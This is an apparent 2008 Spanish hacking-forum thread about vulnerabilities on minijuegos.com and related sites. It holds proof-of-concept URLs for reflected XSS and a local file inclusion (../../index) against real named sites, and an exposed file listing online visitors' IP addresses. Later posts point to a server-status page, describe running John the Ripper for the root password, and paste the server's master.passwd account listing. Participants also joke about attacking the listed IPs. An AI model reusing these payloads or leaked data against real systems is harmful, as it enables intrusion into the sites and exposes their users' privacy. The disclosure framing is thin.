No lo he visto publicado y dentro de lo que cabe parece interesante:
http://www.minijuegos.com/goldcount/datos.txt
Me di cuenta gracias a un RFLocal que vi hace unas horas, daba un error con el nombre goldcount que al buscar en google vi que era un script gratuito (es decir que no lo hicieron ellos) y al bajarlo pone el nombre de "datos.txt" lo añades y listo todas las IPs de los que están online, busqué la mia y si que estaba por lo que si debe funcionar.
Esta interesante ..
¿Como llegasta a lo de Goldcount?
Bueno, cuando usé el RFLocal me dió un error en el contador con esa carpeta, el resto ya lo he contado XD
Muy buen aporte Dimitrix, clap clap.
puede haber un peurto tan sumamente alto ?
Cita de: Codename!! en 18 Mayo 2008, 23:29 PM
puede haber un peurto tan sumamente alto ?
Creo que dirás puerto (O eso dice google XD), bueno teniedo cuenta que va por http y es el 80, y que que las IPs están ordenadas por esa clase de "puerto", supongo que eso será para saber el tiempo que están conectadas, de todos modos el script es gratuito, lo puedes bajar y mirar a ver.
no es el puerto, es el tiempo *nix
echo time();
No debe tener permiso de escritura ese archivo :D ?
no tiene algo mas ese script? >.<
Pones aquí la IP que quieras y suele acertas bastante:
http://www.internautas.org/w-iplocaliza.html
Un saludo y gracias.
Muy buena dimitrix es interesante lo que descubriste y me pregunto lo reportaste o dejaras a personas en peligro :xD
Cita de: Huemulito en 21 Mayo 2008, 02:51 AM
Muy buena dimitrix es interesante lo que descubriste y me pregunto lo reportaste o dejaras a personas en peligro :xD
Mmm... no lo reporté, se me olvidó, además que no lo veo importante.
No obstante ahora lo notifico.
polvo-hack la web mipunto no la conozco por lo que no te puedo ayudar y nadie piensa que seas un terrorista XD
Me suena xDDDDD
El bug ya esta reportado hace tiempo ese y el lfi junto a varios mas, la cuestion es que se dediquen a arregalarlo o pasen :) , el banco BCR sigue siendo vulnerable a la misma vulnerabilidad desde hace la ostia de tiempo y encima es un sql mmmmmmm..... una cosa es reportarlo y otra que te hagan caso :) .
No obstante el de bcr lo publique pero tiene algo de seguridad aunque es posible hacer cosas ( solo teste ), en este caso si me alegraria de verlos follados x"DDDDDDDD .
Dimitrix!! Buen aporte... Se agradece^^ ... no volvere a entrar a minijuegos XD
Lo que me molesta del asunto es que avisé y no hacen nada ni contestan.
:o :o Interesante Pero No sirve De Mucho XD :P
Cita de: 6LuCiFeR9 en 28 Mayo 2008, 21:31 PM
:o :o Interesante Pero No sirve De Mucho XD :P
cuencuedo con usted joven.
disculpa mi ignorancia pero que es RFLocal ?
jamas habia oido hablar de el....
sacame de la duda.
Es que la ignorancia no tiene precio R = Remote por lo cual no es RFLocal es LFI o Local File Inclusion, lo cual quiere decir que al igual que con un RFI pedes meterle un archivo remoto, con un LFI lo puedes hacer con un archivo local.
RFLocal ( Nunca lo habia escuchado ), y el reporte original es mio dado como LFI "Local File Inclusion".
Reporte original, hay dos bug uno el de minijuegos y el otro en petardas que no viene al caso pero los reporte el mismo dia.
Bug En Petardas y Minijuegos - [29-11-06]
-El grupo !Patitos Team reporta 2 bug. El primero es un XSS en la pagina pornografica de Petardas. El segundo un local file include en la pagina de juegos y ocio de MiniJuegos .
@PoC Petardas: http://www.petardas.com:80/videos/video.php?v=gatito&yt=>"><script>alert(31337);</script>
@PoC MiniJuegos: http://www.minijuegos.com/juegos/jugar.php?id=../../index
@PoC MiniJuegos: http://www.minijuegos.com/juegos/jugar.php?id=[LFI]
Me estaba mofando men ovio not found jaja
ahm ok yo tambien me mofe de el un rato x"DDDDDDDDDDDDDDD es digno de ello :P yo creia que era duda seria jajajaja , bue nada esto ya queda cerrado creo yo no? x"DDDDDDDDDD ademas se fue del foro debe ser que le dio verguenza.
En3rgy el code de tu firma se me hace conocida :P
vaaaamos a juackiar todas esas IPs sisisisis!!!
ajaja
aporte interesantee, salu2!
pd, con la coña tiene un cojón de visitas este tema.... alelele
Perdon si esta mal "posteado", pero aca hay una vulnerabilidad sobre XSS o HTMLi en minijuegos.com:
http://www.minijuegos.com/busqueda.php?nov=0&termino=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E
UPDATE: Y despues dejaron intensionalmente (creo ;D) server-status habilitado:
http://www.minijuegos.com/server-status
Lo que nos permitiria ver en tiempo real a los usuarios conectados, path del servidor, la accion que toma el usuario remoto, etc.
Y en minitoneos.com, por el input de usuario [metodo POST]:
http://www.minitorneos.com/registro/
Saludos!
Es como un RFI (Remote File Include) pero con archivos locales de su cuenta.
pues eso LFI ( Local File Include/Inclusion ).
o RFI ( Remote File Include/Inclusion ).
¿Tan dificil es? xDDDDDDD
¿no es realmente humillante para ti lo que escribes?
http://www.minijuegos.com/admin :laugh:
Muy curioso, un FreeBSD, kernel vulnerable y el john aun no entrega pass de root XDDD
PASSWORDS
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
ftp:*:21:14:FTP owner:/nonexistent:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:*:1001:0:Admin User:/home/admin:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
pdns_recursor:*:120:120:pdns_recursor pseudo-user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
user3:*:1002:1002:User &:/home/user3:/bin/tcsh
-berz3k.